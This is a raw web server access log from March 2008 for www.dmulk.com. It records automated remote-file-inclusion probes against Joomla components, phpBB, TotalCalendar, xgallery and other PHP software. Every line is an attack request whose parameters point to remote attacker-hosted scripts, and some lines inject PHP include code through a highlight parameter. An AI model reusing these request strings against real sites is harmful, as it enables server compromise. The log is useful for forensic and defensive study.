66.96.80.40 - - [16/Mar/2008:08:19:04 -0700] "GET /logs/access_080117.log//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://matyie.t35.com/mic/mic22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
61.14.17.111 - - [16/Mar/2008:08:19:47 -0700] "GET /logs/access_080228.log//modules/TotalCalendar/about.php?inc_dir=http://www.cdpm3.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
61.14.17.111 - - [16/Mar/2008:08:19:47 -0700] "GET /logs//modules/TotalCalendar/about.php?inc_dir=http://www.cdpm3.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
91.192.194.21 - - [16/Mar/2008:08:19:54 -0700] "GET /logs/access_080228.log//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://matyie.t35.com/mic/mic22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.96.80.40 - - [16/Mar/2008:08:19:57 -0700] "GET /logs/access_080228.log//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://matyie.t35.com/mic/mic22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
66.96.80.40 - - [16/Mar/2008:08:19:57 -0700] "GET //components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://matyie.t35.com/mic/mic22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
66.96.80.40 - - [16/Mar/2008:08:19:57 -0700] "GET /logs//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://matyie.t35.com/mic/mic22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
61.14.17.111 - - [16/Mar/2008:08:20:05 -0700] "GET /logs/access_080211.log//modules/TotalCalendar/about.php?inc_dir=http://www.cdpm3.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
195.56.111.194 - - [16/Mar/2008:08:20:09 -0700] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.techbomb.com/fastmicrowave/coges.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
124.217.247.200 - - [16/Mar/2008:08:20:10 -0700] "GET /logs/access.log/joomla/index.php?option=com_restaurante&task=http://veldega-tour.ru/.log/idscan3.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.96.80.40 - - [16/Mar/2008:08:20:21 -0700] "GET /logs/access_080211.log//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://matyie.t35.com/mic/mic22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
91.192.194.21 - - [16/Mar/2008:08:20:23 -0700] "GET //components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://matyie.t35.com/mic/mic22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
91.192.194.21 - - [16/Mar/2008:08:20:24 -0700] "GET /logs//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://matyie.t35.com/mic/mic22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
91.192.194.21 - - [16/Mar/2008:08:20:33 -0700] "GET /logs/access_080228.log//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.iammypersonalbest.com/oneadmin/linksdir/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
91.192.194.21 - - [16/Mar/2008:08:20:34 -0700] "GET //components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.iammypersonalbest.com/oneadmin/linksdir/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
58.26.137.64 - - [16/Mar/2008:08:20:37 -0700] "GET /logs/access.log/joomla/index.php?option=com_restaurante&task=http://anjink.co.cc/gen/mix.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
216.130.191.251 - - [16/Mar/2008:08:21:03 -0700] "GET /logs/access_080215.log//login.php?dir=http://12.30.229.109/images/.../di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.130.191.251 - - [16/Mar/2008:08:21:25 -0700] "GET /logs/access_080201.log//modules/TotalCalendar/about.php?inc_dir=http://12.30.229.109/images/.../di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.130.191.251 - - [16/Mar/2008:08:21:25 -0700] "GET //modules/TotalCalendar/about.php?inc_dir=http://12.30.229.109/images/.../di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.130.191.251 - - [16/Mar/2008:08:21:25 -0700] "GET /logs//modules/TotalCalendar/about.php?inc_dir=http://12.30.229.109/images/.../di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.128.49.197 - - [16/Mar/2008:08:21:44 -0700] "GET /logs/access_080215.log//?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://veldega-tour.ru/.log/idscan2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.128.49.197 - - [16/Mar/2008:08:21:44 -0700] "GET //?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://veldega-tour.ru/.log/idscan2.txt? HTTP/1.1" 200 3094 "-" "libwww-perl/5.805" "www.dmulk.com"
195.128.49.197 - - [16/Mar/2008:08:21:45 -0700] "GET /logs//?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://veldega-tour.ru/.log/idscan2.txt? HTTP/1.1" 200 38981 "-" "libwww-perl/5.805" "www.dmulk.com"
217.172.188.77 - - [16/Mar/2008:08:21:58 -0700] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.techbomb.com/fastmicrowave/coges.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
213.26.122.5 - - [16/Mar/2008:08:22:02 -0700] "GET /logs//modules/links/showlinks.php?language_home=&rootdp=zZz&gsLanguage=http://ezsm.ru/media/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
213.26.122.5 - - [16/Mar/2008:08:22:02 -0700] "GET //modules/links/showlinks.php?language_home=&rootdp=zZz&gsLanguage=http://ezsm.ru/media/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.172.174.208 - - [16/Mar/2008:08:22:55 -0700] "GET /logs/index.php/osta/protokoly/3kad/komisje/kr/orgapraw/index.phphttp://www.gooteo.com/adpics/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
74.52.24.58 - - [16/Mar/2008:08:23:03 -0700] "GET /logs/access_071229.log//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.iammypersonalbest.com/oneadmin/linksdir/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
74.52.24.58 - - [16/Mar/2008:08:23:03 -0700] "GET //index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.iammypersonalbest.com/oneadmin/linksdir/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
74.52.24.58 - - [16/Mar/2008:08:23:03 -0700] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.iammypersonalbest.com/oneadmin/linksdir/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
74.52.24.58 - - [16/Mar/2008:08:23:07 -0700] "GET /logs/access_080211.log//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.iammypersonalbest.com/oneadmin/linksdir/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
88.84.155.27 - - [16/Mar/2008:08:23:09 -0700] "GET /logs/access_080118.log/cmses/aedating4CMS.php?dir[inc]=http://www.mode-gone.net/faq/faq.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
88.84.155.27 - - [16/Mar/2008:08:23:10 -0700] "GET /cmses/aedating4CMS.php?dir[inc]=http://www.mode-gone.net/faq/faq.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
88.84.155.27 - - [16/Mar/2008:08:23:10 -0700] "GET /logs/cmses/aedating4CMS.php?dir[inc]=http://www.mode-gone.net/faq/faq.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
88.84.155.27 - - [16/Mar/2008:08:23:16 -0700] "GET /logs/access_080124.log/cmses/aedating4CMS.php?dir[inc]=http://www.mode-gone.net/faq/faq.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
74.52.24.58 - - [16/Mar/2008:08:23:30 -0700] "GET /logs/access_080117.log//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.iammypersonalbest.com/oneadmin/linksdir/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
217.172.174.208 - - [16/Mar/2008:08:23:48 -0700] "GET /logs//viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.gooteo.com/adpics/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
217.172.174.208 - - [16/Mar/2008:08:24:16 -0700] "GET /index.php/osta/protokoly/3kad/komisje/kr/orgapraw/index.phphttp://www.gooteo.com/adpics/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
217.172.174.208 - - [16/Mar/2008:08:24:21 -0700] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.gooteo.com/adpics/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
217.172.174.208 - - [16/Mar/2008:08:24:26 -0700] "GET //viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.gooteo.com/adpics/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
217.172.174.208 - - [16/Mar/2008:08:24:30 -0700] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.gooteo.com/adpics/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
61.14.17.111 - - [16/Mar/2008:08:24:30 -0700] "GET /logs/access.log//atom.php5?page=http://www.cdpm3.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
61.14.17.111 - - [16/Mar/2008:08:24:31 -0700] "GET /logs//atom.php5?page=http://www.cdpm3.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.55.133.237 - - [16/Mar/2008:08:24:54 -0700] "GET /logs/access_080201.log//modules/TotalCalendar/about.php?inc_dir=http://www.cdpm3.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.55.133.237 - - [16/Mar/2008:08:24:54 -0700] "GET /logs//modules/TotalCalendar/about.php?inc_dir=http://www.cdpm3.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.52.24.58 - - [16/Mar/2008:08:25:01 -0700] "GET /logs/access_080228.log//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.iammypersonalbest.com/oneadmin/linksdir/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
74.52.24.58 - - [16/Mar/2008:08:25:01 -0700] "GET //components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.iammypersonalbest.com/oneadmin/linksdir/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
74.52.24.58 - - [16/Mar/2008:08:25:02 -0700] "GET /logs//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.iammypersonalbest.com/oneadmin/linksdir/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
82.100.220.50 - - [16/Mar/2008:08:25:03 -0700] "GET /logs/access_071229.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.techbomb.com/fastmicrowave/coges.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.100.220.50 - - [16/Mar/2008:08:25:04 -0700] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.techbomb.com/fastmicrowave/coges.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.130.191.251 - - [16/Mar/2008:08:25:11 -0700] "GET /logs/access_080124.log//modules/TotalCalendar/about.php?inc_dir=http://12.30.229.109/images/.../di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
218.150.160.162 - - [16/Mar/2008:08:25:13 -0700] "GET /logs//components/com_zoom/classes/iptc/EXIF.php?mosConfig_absolute_path=http://www.freewebtown.com/crxr/cp?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
218.150.160.162 - - [16/Mar/2008:08:25:15 -0700] "GET //components/com_zoom/classes/iptc/EXIF.php?mosConfig_absolute_path=http://www.freewebtown.com/crxr/cp?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
218.150.160.162 - - [16/Mar/2008:08:25:19 -0700] "GET /logs//components/com_zoom/classes/iptc/EXIF.php?mosConfig_absolute_path=http://www.freewebtown.com/perocs/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)" "www.dmulk.com"
218.150.160.162 - - [16/Mar/2008:08:25:21 -0700] "GET //components/com_zoom/classes/iptc/EXIF.php?mosConfig_absolute_path=http://www.freewebtown.com/perocs/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)" "www.dmulk.com"
74.52.24.58 - - [16/Mar/2008:08:25:21 -0700] "GET /logs/access_080211.log//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.iammypersonalbest.com/oneadmin/linksdir/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
216.130.191.251 - - [16/Mar/2008:08:25:30 -0700] "GET /logs/access_080129.log//index.php?pageurl=http://12.30.229.109/images/.../di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
91.192.194.21 - - [16/Mar/2008:08:25:48 -0700] "GET /logs/access_071229.log//components/com_minibb.php?absolute_path=http://www.iammypersonalbest.com/oneadmin/linksdir/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
91.192.194.21 - - [16/Mar/2008:08:25:52 -0700] "GET /logs/access_071229.log//components/minibb/index.php?absolute_path=http://matyie.t35.com/mic/mic22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
91.192.194.21 - - [16/Mar/2008:08:25:52 -0700] "GET //components/minibb/index.php?absolute_path=http://matyie.t35.com/mic/mic22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
91.192.194.21 - - [16/Mar/2008:08:25:57 -0700] "GET /logs/access_071229.log//components/minibb/index.php?absolute_path=http://www.iammypersonalbest.com/oneadmin/linksdir/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
91.192.194.21 - - [16/Mar/2008:08:25:58 -0700] "GET /logs//components/minibb/index.php?absolute_path=http://www.iammypersonalbest.com/oneadmin/linksdir/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
91.192.194.21 - - [16/Mar/2008:08:25:58 -0700] "GET /logs//components/com_minibb.php?absolute_path=http://matyie.t35.com/mic/mic22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
91.192.194.21 - - [16/Mar/2008:08:26:02 -0700] "GET /logs/access_071229.log//components/com_minibb.php?absolute_path=http://matyie.t35.com/mic/mic22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
91.192.194.21 - - [16/Mar/2008:08:26:02 -0700] "GET /logs//components/com_minibb.php?absolute_path=http://matyie.t35.com/mic/mic22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
75.126.140.58 - - [16/Mar/2008:08:26:03 -0700] "GET /logs/access_080207.log//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://200.220.159.91/~regina/xpl/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
213.239.175.35 - - [16/Mar/2008:08:26:05 -0700] "GET /logs/access_080131.log//index.php?pagina=http://www.newarkfirefighterspipeband.com/calendar/ws/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
213.239.175.35 - - [16/Mar/2008:08:26:05 -0700] "GET //index.php?pagina=http://www.newarkfirefighterspipeband.com/calendar/ws/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
91.192.194.21 - - [16/Mar/2008:08:26:07 -0700] "GET //components/minibb/index.php?absolute_path=http://matyie.t35.com/mic/mic22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.100.220.50 - - [16/Mar/2008:08:26:14 -0700] "GET /logs/access_080211.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.techbomb.com/fastmicrowave/coges.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
124.217.247.166 - - [16/Mar/2008:08:26:19 -0700] "GET /logs/access_080215.log/components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://webmail.asl3.umbria.it/admin/inc/albania.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
124.217.247.166 - - [16/Mar/2008:08:26:19 -0700] "GET /logs/components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://webmail.asl3.umbria.it/admin/inc/albania.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
209.85.114.4 - - [16/Mar/2008:08:26:38 -0700] "GET /logs/access_080131.log//index.php?pagina=http://www.newarkfirefighterspipeband.com/calendar/ws/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
209.85.114.4 - - [16/Mar/2008:08:26:38 -0700] "GET //index.php?pagina=http://www.newarkfirefighterspipeband.com/calendar/ws/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
66.96.80.40 - - [16/Mar/2008:08:26:40 -0700] "GET /logs/access_071229.log//components/minibb/index.php?absolute_path=http://matyie.t35.com/mic/mic22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
66.96.80.40 - - [16/Mar/2008:08:26:41 -0700] "GET //components/minibb/index.php?absolute_path=http://matyie.t35.com/mic/mic22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
66.96.80.40 - - [16/Mar/2008:08:26:41 -0700] "GET /logs//components/minibb/index.php?absolute_path=http://matyie.t35.com/mic/mic22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
66.96.80.40 - - [16/Mar/2008:08:26:44 -0700] "GET /logs/access_071229.log//components/com_minibb.php?absolute_path=http://matyie.t35.com/mic/mic22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
66.96.80.40 - - [16/Mar/2008:08:26:44 -0700] "GET //components/com_minibb.php?absolute_path=http://matyie.t35.com/mic/mic22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
66.96.80.40 - - [16/Mar/2008:08:26:44 -0700] "GET /logs//components/com_minibb.php?absolute_path=http://matyie.t35.com/mic/mic22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
195.56.111.194 - - [16/Mar/2008:08:27:44 -0700] "GET /logs/access_071229.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.techbomb.com/fastmicrowave/coges.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
195.56.111.194 - - [16/Mar/2008:08:27:44 -0700] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.techbomb.com/fastmicrowave/coges.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
91.192.194.21 - - [16/Mar/2008:08:27:59 -0700] "GET //components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://matyie.t35.com/mic/mic22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
91.192.194.21 - - [16/Mar/2008:08:27:59 -0700] "GET /logs//components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://matyie.t35.com/mic/mic22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
91.192.194.21 - - [16/Mar/2008:08:28:01 -0700] "GET //components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.iammypersonalbest.com/oneadmin/linksdir/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
81.169.168.26 - - [16/Mar/2008:08:28:10 -0700] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.marthamaria-halle.de//cache/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)" "www.dmulk.com"
195.56.111.194 - - [16/Mar/2008:08:28:35 -0700] "GET /logs/access_080228.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.techbomb.com/fastmicrowave/coges.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
91.192.194.21 - - [16/Mar/2008:08:28:52 -0700] "GET /logs/access_080228.log//components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://matyie.t35.com/mic/mic22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.172.174.208 - - [16/Mar/2008:08:28:59 -0700] "GET /index.php?option=com_Exchange&Itemid=&mosConfig_absolute_path=http://www.gooteo.com/adpics/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
217.172.174.208 - - [16/Mar/2008:08:29:00 -0700] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.gooteo.com/adpics/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
217.172.174.208 - - [16/Mar/2008:08:29:01 -0700] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.gooteo.com/adpics/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
213.239.175.35 - - [16/Mar/2008:08:29:06 -0700] "GET //index.php?pagina=http://www.newarkfirefighterspipeband.com/calendar/ws/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.96.80.40 - - [16/Mar/2008:08:29:15 -0700] "GET /logs/access_080228.log//components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://matyie.t35.com/mic/mic22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
66.96.80.40 - - [16/Mar/2008:08:29:16 -0700] "GET //components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://matyie.t35.com/mic/mic22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
66.96.80.40 - - [16/Mar/2008:08:29:16 -0700] "GET /logs//components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://matyie.t35.com/mic/mic22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
64.92.172.194 - - [16/Mar/2008:08:29:34 -0700] "GET /logs/access_080201.log//convert/mvcw.php?step=1&vwar_root=http://74.54.207.2/~cogu/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.92.172.194 - - [16/Mar/2008:08:29:34 -0700] "GET //convert/mvcw.php?step=1&vwar_root=http://74.54.207.2/~cogu/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.92.172.194 - - [16/Mar/2008:08:29:34 -0700] "GET /logs//convert/mvcw.php?step=1&vwar_root=http://74.54.207.2/~cogu/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.130.191.251 - - [16/Mar/2008:08:29:38 -0700] "GET /logs/access_080131.log//index.php?pagina=http://12.30.229.109/images/.../di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.130.191.251 - - [16/Mar/2008:08:29:38 -0700] "GET //index.php?pagina=http://12.30.229.109/images/.../di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.130.191.251 - - [16/Mar/2008:08:29:38 -0700] "GET /logs//index.php?pagina=http://12.30.229.109/images/.../di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.58.242.138 - - [16/Mar/2008:08:29:39 -0700] "GET /logs/access_080122.log/modules/Neos_Chronos/header.php?base_folder=http://h1.ripway.com/mala/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.58.242.138 - - [16/Mar/2008:08:29:39 -0700] "GET /logs/modules/Neos_Chronos/header.php?base_folder=http://h1.ripway.com/mala/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
63.147.134.12 - - [16/Mar/2008:08:29:45 -0700] "GET /logs/access_080225.log//components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
63.147.134.12 - - [16/Mar/2008:08:29:45 -0700] "GET /logs//components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
212.25.95.194 - - [16/Mar/2008:08:29:52 -0700] "GET /logs/access_080201.log//modules/TotalCalendar/about.php?inc_dir=http://www.newarkfirefighterspipeband.com/calendar/ws/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
212.25.95.194 - - [16/Mar/2008:08:29:54 -0700] "GET //modules/TotalCalendar/about.php?inc_dir=http://www.newarkfirefighterspipeband.com/calendar/ws/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
